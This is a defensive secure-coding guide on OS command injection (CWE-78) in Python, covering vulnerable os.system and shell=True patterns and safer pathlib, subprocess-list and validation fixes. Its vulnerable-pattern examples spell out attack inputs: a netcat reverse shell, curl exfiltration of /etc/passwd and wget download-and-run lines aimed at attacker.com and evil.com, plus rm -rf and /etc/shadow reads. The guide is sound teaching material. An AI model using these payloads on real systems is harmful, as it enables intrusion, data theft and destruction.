CWE-78: OS Command Injection - Python

Overview

OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.

Primary Defense: Use Python standard-library modules or maintained Python packages (pathlib, shutil, requests, zipfile, etc.) instead of system commands. If process execution is unavoidable, use subprocess.run() with an argument list and shell=False. Avoid launching shell scripts or batch files with untrusted arguments; platform-specific shell parsing can reappear even when your Python code does not explicitly request a shell.

Remediation Strategy

Priority 1: PRIMARY FIX - Avoid System Calls

Use Python native libraries instead of executing commands

This eliminates the vulnerability entirely
Do NOT use subprocess or os.system() if a Python library exists

Priority 2: SECONDARY FIX - Use subprocess.run() with Argument List

Set shell=False, pass arguments as a list

WARNING: Only use if Priority 1 is not possible
Must use a list of arguments with shell=False (CRITICAL)

Priority 3: Defense in Depth - Input Validation

Allowlist permitted characters

Required in addition to Priority 1 or 2
Never use validation alone

Priority 4: Additional Hardening - Least Privilege

Drop privileges, use resource limits

Apply alongside other fixes

Decision Tree

Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, shutil, requests, etc.)
│  ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│  └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│  ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│  └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
   ├─ Add input validation (Priority 3)
   └─ Apply least privilege (Priority 4)

Common Vulnerable Patterns

String Concatenation with os.system()

# VULNERABLE - Command injection via string concatenation

filename = request.GET['file']
os.system('ls -la ' + filename)

# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp

Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.

Using subprocess with shell=True

# VULNERABLE - Shell command injection

user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)

# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file

Why this is vulnerable: With shell=True, subprocess.run() hands the whole formatted string to the shell (/bin/sh on POSIX), so pipes, command substitution such as $(...), and other metacharacters in user_input are interpreted as shell syntax instead of as part of a filename.

subprocess.Popen with Shell Invocation

# VULNERABLE - Invoking shell allows command injection

ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)

# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands

Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.

Unvalidated Input in subprocess.call()

# VULNERABLE - No input validation with shell=True

user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)

# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; python /tmp/m.sh"
# Result: Downloads and executes malware

Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.

Secure Patterns

Use Python Native Libraries (PREFERRED - Eliminates Command Injection)

# SECURE - Use pathlib instead of OS commands such as "ls -la"

from pathlib import Path

directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")

# More file operations

import shutil
content = Path(filepath).read_text()           # Instead of "cat"
shutil.copy(source, dest)                      # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True)  # Instead of "mkdir -p"
Path(filepath).unlink()                        # Instead of "rm"

Why this works: Python's pathlib and shutil modules operate on the filesystem through library calls instead of shell commands. This removes the command injection vector: no child process is started, no shell interprets metacharacters like ;, |, or &&, and there is nothing to chain commands onto. These functions are also more portable across operating systems than system commands. Paths built from user input still need validation against traversal outside the intended directory.

Use requests Library for Network Operations

# SECURE - Use requests instead of wget/curl commands

import requests

response = requests.get(url, timeout=30)
content = response.content

# For downloads

with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)

Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.

Use tarfile/zipfile for Archives

# SECURE - Use tarfile extraction filters instead of tar commands

import tarfile
from pathlib import Path

with tarfile.open(archive, 'r:gz') as tar:
    # Python 3.12+ (also backported to 3.8.17, 3.9.17, 3.10.12, and 3.11.4):
    # the data filter blocks absolute paths, outside-destination paths,
    # dangerous links, and special files.
    tar.extractall(path='./extracted', filter='data')

# For ZIP files

import zipfile
from pathlib import Path

destination = Path('./extracted').resolve()
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        target = (destination / member).resolve()
        if not target.is_relative_to(destination):
            raise ValueError(f'Unsafe archive member: {member}')
        if Path(member).is_absolute():
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall(destination)

Why this works: Python's tarfile and zipfile modules handle archive operations without calling external tar, unzip, or 7z commands, so archive names cannot become shell syntax. For tar archives, Python 3.12+ extraction filters provide the important safety boundary: filter='data' rejects absolute paths, entries that would extract outside the destination, dangerous hardlinks/symlinks, and special files. For zip archives, resolving each destination path and checking is_relative_to(destination) prevents zip-slip traversal even when paths contain nested .. components. These archive checks address filesystem escape risks; they are separate from command injection prevention.

For older Python versions without tar extraction filters, do not extract untrusted tar files unless you implement equivalent checks for paths, links, special files, file count, and extracted size. Even with filter='data', extract untrusted archives into a new temporary directory and apply resource limits to reduce denial-of-service risk.
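
The path, file-count, and size checks described above can be sketched for ZIP archives as follows. This is a minimal illustration, not a complete archive sandbox: the function name safe_extract_zip and both limits are hypothetical, the size check relies on the uncompressed sizes declared in the archive headers, and Path.is_relative_to() requires Python 3.9 or later.

```python
import zipfile
from pathlib import Path

# Illustrative limits (assumptions); tune them for the application.
MAX_MEMBERS = 1000
MAX_TOTAL_BYTES = 100 * 1024 * 1024  # 100 MB of declared uncompressed data


def safe_extract_zip(archive_path, destination):
    """Extract a ZIP after checking member count, declared size, and paths."""
    dest = Path(destination).resolve()
    with zipfile.ZipFile(archive_path) as zf:
        members = zf.infolist()
        if len(members) > MAX_MEMBERS:
            raise ValueError("Too many archive members")
        # file_size is the uncompressed size recorded in the archive header.
        total = sum(info.file_size for info in members)
        if total > MAX_TOTAL_BYTES:
            raise ValueError("Archive expands beyond the size limit")
        for info in members:
            # Absolute names and ../ sequences both resolve outside dest.
            target = (dest / info.filename).resolve()
            if not target.is_relative_to(dest):
                raise ValueError(f"Unsafe archive member: {info.filename}")
        dest.mkdir(parents=True, exist_ok=True)
        zf.extractall(dest)
    return dest
```

Running every check before extractall() means a rejected archive leaves nothing on disk.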

Use re Module for Text Processing

# SECURE - Use re module instead of grep commands

import re
from pathlib import Path

content = Path(filepath).read_text()
matches = re.findall(pattern, content)

# Line-by-line processing

with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]

Why this works: Python's re module and file I/O operations provide text processing without executing grep, sed, awk, or other shell utilities. Processing text in Python avoids command injection and behaves the same across platforms, and list comprehensions and regex operations are usually easier to maintain than complex shell pipelines. If the pattern itself comes from a user, treat it as untrusted as well; for a literal match, a plain substring test or re.escape() avoids interpreting it as regex syntax.

subprocess.run() with Argument List (If Process Execution Required)

WARNING: Avoid executing OS commands if at all possible. The standard library and maintained packages cover most common tasks (pathlib, zipfile, requests, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all library alternatives first.

# USE WITH CAUTION - When process execution is unavoidable, use argument list

import subprocess
import ipaddress

ip_address = request.GET['ip']

# Validate input first
try:
    ipaddress.ip_address(ip_address)
except ValueError:
    raise ValueError('Invalid IP address')

# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)

print(result.stdout)

Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without Python invoking /bin/sh or cmd.exe. Even if ip_address contains shell metacharacters like ; or &&, they are treated as literal argument data rather than command separators. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess. On Windows, avoid launching .bat or .cmd files with untrusted arguments; Python documents platform-specific cases where batch files may still be processed by a system shell.
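
The literal-argument behavior can be observed with a harmless child process. In this sketch the child is the current Python interpreter (chosen only for portability) and the payload string is a made-up example; the child prints the arguments it received.

```python
import subprocess
import sys

# Hypothetical hostile input containing shell metacharacters.
payload = "8.8.8.8; echo INJECTED"

# The child only reports the arguments it was given.
child_code = "import sys; print(repr(sys.argv[1:]))"

result = subprocess.run(
    [sys.executable, "-c", child_code, payload],  # argument list, no shell
    capture_output=True,
    text=True,
    shell=False,
    timeout=10,
    check=True,
)

received = result.stdout.strip()
print(received)  # ['8.8.8.8; echo INJECTED']
```

The whole payload arrives as one argument and nothing after the semicolon runs. The target program still decides how to interpret that argument, which is why validation remains necessary.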

subprocess.run() with Path Validation (For File Operations)

WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).

For file operations requiring subprocess - always validate paths.

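# AVOID IF POSSIBLE - Validate paths before use

import re
from pathlib import Path

filename = request.GET['file']

# Validate filename: allowlisted characters only, and no leading '-' or '.'
# (a leading '-' could be read as an option by an external program).
# fullmatch() is used because '$' with match() also accepts a trailing newline.
if not re.fullmatch(r'[a-zA-Z0-9_][a-zA-Z0-9._-]*', filename):
    raise ValueError('Invalid filename')

# Better: Use pathlib instead of subprocess
base_dir = Path('/uploads').resolve()
file_path = (base_dir / filename).resolve()
if not file_path.is_relative_to(base_dir):
    raise ValueError('Path traversal detected')

content = file_path.read_text()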

Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
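
The containment check can be packaged as a small reusable helper. This is a sketch under stated assumptions: the name resolve_under is hypothetical, and Path.is_relative_to() requires Python 3.9 or later.

```python
from pathlib import Path


def resolve_under(base_dir, user_name):
    """Return the resolved path for user_name, or raise if it leaves base_dir."""
    base = Path(base_dir).resolve()
    # Joining with an absolute user_name discards base, so the check below
    # also rejects inputs such as "/etc/passwd".
    candidate = (base / user_name).resolve()
    if not candidate.is_relative_to(base):
        raise ValueError("Path traversal detected")
    return candidate
```

A caller would use the returned path for every later file operation, so the checked path and the path actually opened are the same object.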

Input Validation (Defense in Depth)

Allowlist Validation

import ipaddress
import re

def validate_filename(filename):
    """Allow only alphanumerics, underscore, dash, and dot; no leading dash or dot"""
    # fullmatch() avoids the trailing-newline match that '$' permits with match()
    if not re.fullmatch(r'[a-zA-Z0-9_][a-zA-Z0-9._-]*', filename):
        raise ValueError('Invalid filename characters')
    return filename

def validate_ip_address(ip):
    """Validate IPv4 format"""
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        raise ValueError('Invalid IP address') from None
    return ip

Framework-Specific Guidance

Django/Flask Integration

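# Django view with validation

import ipaddress
import subprocess

from django.http import HttpResponse, HttpResponseBadRequest

def ping_view(request):
    ip_address = request.GET.get('ip', '')

    try:
        ipaddress.ip_address(ip_address)
    except ValueError:
        return HttpResponseBadRequest('Invalid IP')

    # The validated value is passed as one list element; no shell is involved
    try:
        result = subprocess.run(
            ['ping', '-c', '4', ip_address],
            capture_output=True,
            shell=False,
            timeout=10  # Prevent a hung ping from tying up the worker
        )
    except subprocess.TimeoutExpired:
        return HttpResponse('Ping timed out', status=504)
    return HttpResponse(result.stdout)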

shlex for Argument Parsing (Use Carefully)

import shlex
import subprocess

# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template

cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip)  # Append validated user input
subprocess.run(args, shell=False)

# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input)  # Still vulnerable!
# subprocess.run(args, shell=False)
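
To see why splitting untrusted input is still unsafe, it helps to look at what shlex.split() returns without executing anything. The hostile string below is a made-up example.

```python
import shlex

# Trusted, developer-written template: the result is predictable.
trusted_args = shlex.split("ping -c 4")
print(trusted_args)  # ['ping', '-c', '4']

# Hypothetical untrusted input: the caller picks the program and its flags.
hostile = "rm -rf /tmp/target"
hostile_args = shlex.split(hostile)
print(hostile_args)  # ['rm', '-rf', '/tmp/target']
```

No shell is needed for the second case to be dangerous: the first list element is the program that subprocess.run() would launch, so whoever controls the string controls the executable.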

Security Best Practices

Use Timeout

try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass
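
One way to make the timeout branch do something useful is to wrap the call in a helper that reports the timeout to its caller. The helper name run_with_timeout is hypothetical, and the slow child is the current Python interpreter sleeping, used only so the sketch runs anywhere.

```python
import subprocess
import sys


def run_with_timeout(args, seconds):
    """Run args without a shell; return stdout, or None if the limit is hit."""
    try:
        result = subprocess.run(
            args, capture_output=True, text=True, shell=False, timeout=seconds
        )
    except subprocess.TimeoutExpired:
        # subprocess.run() kills the child and waits for it before
        # re-raising TimeoutExpired, so no extra cleanup is needed here.
        return None
    return result.stdout


# A child that would run for 5 seconds, limited to half a second.
slow = [sys.executable, "-c", "import time; time.sleep(5)"]
timed_out = run_with_timeout(slow, 0.5)
print(timed_out)  # None
```

Returning None keeps the example short; an application might instead log the event and return a controlled error to the user.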

Limit Resource Usage

import resource  # Unix only
import subprocess

def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024, 
                                                  128 * 1024 * 1024))

    return set_limits

# Use preexec_fn only in simple Unix subprocess launchers.
# In threaded web applications, prefer OS/container/cgroup limits or a worker wrapper.

subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)

Drop Privileges (Unix)

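import os
import pwd
import subprocess

def drop_privileges(username='nobody'):
    """Drop privileges to specified user (the parent must be running as root)"""
    # Look up the account in the parent, before the child is forked
    pw_record = pwd.getpwnam(username)

    def set_user():
        os.setgroups([])             # Drop supplementary groups first
        os.setgid(pw_record.pw_gid)  # Then the group, while still privileged
        os.setuid(pw_record.pw_uid)  # User last; this cannot be undone
    return set_user

# Run subprocess as unprivileged user
# On Python 3.9+, the user=, group=, and extra_groups= parameters of
# subprocess.run() achieve the same result without preexec_fn.

subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)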

Deprecated/Dangerous Functions to Avoid

# NEVER USE THESE:

os.system(cmd)              # Always uses shell
os.popen(cmd)               # Uses shell; prefer subprocess without shell
commands.getoutput(cmd)     # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)

# ALWAYS USE:

subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)

Remediation Steps

Locate each command sink: os.system(), os.popen(), subprocess.* with shell=True, string commands passed to subprocess, or wrappers that call these APIs.
Identify the operation being performed and replace it with a Python API when one exists, such as pathlib, shutil, zipfile, tarfile, re, or a maintained network library.
If process execution is unavoidable, pass an argument list with shell=False, set a timeout, and avoid batch or shell scripts for untrusted arguments.
Validate each argument using a type-specific parser such as ipaddress, Path resolution within an allowlisted base directory, or an allowlist for simple filenames.
Remove fallback paths that still construct command strings, including debug/admin paths and error-handling branches.
Add operational hardening such as low-privilege users, container or OS resource limits, controlled working directories, and restricted environment variables.
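
The last step mentions controlled working directories and restricted environment variables. A minimal sketch of both follows, assuming a made-up secret named APP_SECRET in the parent environment and using the current Python interpreter as a stand-in for the real external program.

```python
import os
import subprocess
import sys
import tempfile

# Hypothetical secret present in the parent's environment.
os.environ["APP_SECRET"] = "example-only"

# Minimal environment for the child. Treat this dict as a starting point:
# on Windows, many programs also need variables such as SYSTEMROOT.
child_env = {"PATH": os.defpath}
if "SYSTEMROOT" in os.environ:
    child_env["SYSTEMROOT"] = os.environ["SYSTEMROOT"]

# A fresh temporary directory serves as the controlled working directory.
with tempfile.TemporaryDirectory() as workdir:
    result = subprocess.run(
        [sys.executable, "-c", "import os; print(os.environ.get('APP_SECRET'))"],
        env=child_env,   # replaces the inherited environment entirely
        cwd=workdir,
        capture_output=True,
        text=True,
        shell=False,
        timeout=10,
    )

child_output = result.stdout.strip()
print(child_output)
```

Because env= replaces the inherited environment instead of extending it, the child does not see APP_SECRET or any other variable that is not listed explicitly.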

Testing

Test normal values for each argument, including valid filenames, paths, IP addresses, and URLs expected by the feature.
Test shell metacharacters such as ;, &&, |, backticks, $(), redirects, quotes, and newlines.
Test argument injection values such as filenames beginning with - or values that could become extra flags.
Test Windows and Unix behavior separately when the application is cross-platform, especially for .bat or .cmd launchers.
Verify invalid input fails before subprocess execution and returns a controlled error.
Re-run static analysis tools such as Bandit and add regression tests around the wrapper or service function that launches processes.
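
The checks above can be turned into regression tests around the function that builds the command. The sketch below uses the standard unittest module; build_ping_args is a hypothetical wrapper standing in for the application's own function, and the payload list is illustrative, not exhaustive.

```python
import ipaddress
import unittest


def build_ping_args(ip_text):
    """Hypothetical wrapper: validate ip_text and return the argv list for ping."""
    address = ipaddress.ip_address(ip_text)  # raises ValueError on bad input
    return ["ping", "-c", "4", str(address)]


class BuildPingArgsTests(unittest.TestCase):
    def test_valid_address(self):
        self.assertEqual(
            build_ping_args("8.8.8.8"), ["ping", "-c", "4", "8.8.8.8"]
        )

    def test_rejects_hostile_input(self):
        payloads = [
            "8.8.8.8; rm -rf /tmp/x",   # command separator
            "8.8.8.8 && id",            # logical operator
            "8.8.8.8 | id",             # pipe
            "`id`",                     # backticks
            "$(id)",                    # command substitution
            "8.8.8.8 > /tmp/out",       # redirect
            "8.8.8.8\n",                # trailing newline
            "-f",                       # value that could become a flag
        ]
        for payload in payloads:
            with self.subTest(payload=payload):
                with self.assertRaises(ValueError):
                    build_ping_args(payload)
```

Saved as a test module, this runs with python -m unittest. Keeping validation and argument construction in one function lets the tests run without launching a process.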

Common Pitfalls

Passing a list to subprocess.run() but also setting shell=True.
Using shlex.split() on untrusted user input and treating the result as safe.
Validating with a denylist of shell metacharacters while still invoking a shell.
Using regex-only IP validation that accepts invalid addresses; use ipaddress for IP values.
Replacing a command injection bug with path traversal by passing unvalidated filenames into file operations.
Relying on timeouts, dropped privileges, or resource limits as the primary fix instead of removing shell interpretation.
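
The regex pitfall is easy to reproduce. In this sketch the pattern NAIVE_IPV4 is an illustrative example of a typical hand-written check, not taken from any particular codebase, and is_valid_ip is a hypothetical helper around the ipaddress module.

```python
import ipaddress
import re

# A typical hand-written pattern (illustrative): four dotted groups of digits.
NAIVE_IPV4 = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")


def is_valid_ip(text):
    """Return True only if the ipaddress module accepts text."""
    try:
        ipaddress.ip_address(text)
    except ValueError:
        return False
    return True


for candidate in ["192.168.1.10", "999.999.999.999", "8.8.8.8\n"]:
    regex_ok = bool(NAIVE_IPV4.match(candidate))
    print(repr(candidate), regex_ok, is_valid_ip(candidate))
# '192.168.1.10' True True
# '999.999.999.999' True False
# '8.8.8.8\n' True False
```

The pattern accepts out-of-range octets, and because $ also matches just before a trailing newline, it accepts the third value too; ipaddress rejects both.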

Dependencies and Installation

pathlib, shutil, subprocess, zipfile, tarfile, ipaddress, and re are in the Python standard library.
requests is a third-party package for HTTP operations; keep it current through the project's dependency manager.
Bandit can help detect dangerous subprocess patterns, but manual review is still needed to confirm whether data is untrusted and whether shell=True or string commands are reachable.

Additional Resources

Bandit Security Linter - Detects subprocess issues
CWE-78 Definition
OWASP Command Injection
Python Requests Library
Python pathlib Module
Python shutil Module
Python subprocess Documentation
Python tarfile Module
Python zipfile Module